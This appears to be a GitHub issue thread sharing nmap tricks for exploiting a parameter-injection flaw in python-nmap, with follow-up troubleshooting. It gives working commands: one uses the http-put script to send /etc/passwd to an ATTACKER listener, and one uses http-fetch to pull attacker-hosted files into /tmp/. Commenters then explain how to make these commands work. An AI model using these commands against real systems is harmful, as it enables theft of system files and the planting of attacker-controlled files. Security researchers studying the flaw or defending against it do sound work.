nmap read/write tricks

Question

nmap read/write tricks

s0i37 opened this issue 5 years ago · 3 comments

Hello.
Sorry I have a not enough time for creating pull request.
I want to suggest a few tricks who helped me with exploting "https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection" without direct access to file system.

arbitrary file read

nc -nv -lp 80
nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'

arbitrary file write

php -S 0.0.0.0:80 -t . router_with_directory_listing.php
nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'

Answer 1 · 2019-07-28T11:19:30.000Z

I'm having hard time getting these to work, all I get is a successful scan but no HTTP traffic.

In terminal A (no output):

$ socat -v tcp-listen:1234,reuseaddr,fork -

In terminal B:

$ nmap -p 1234 127.0.0.1 --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-28 13:17 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).

PORT     STATE SERVICE
1234/tcp open  hotline

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

Answer 2 · 2019-07-29T11:55:04.000Z

This happens because nmap dont sure that 1234 is web port. Usally some nse-scripts require service type determination.
I suggest you to use 8080 port, because nmap thinks that is web port by default like a 80.

Answer 3 · 2019-07-29T14:42:35.000Z

This sucks... but that was the reason, thanks.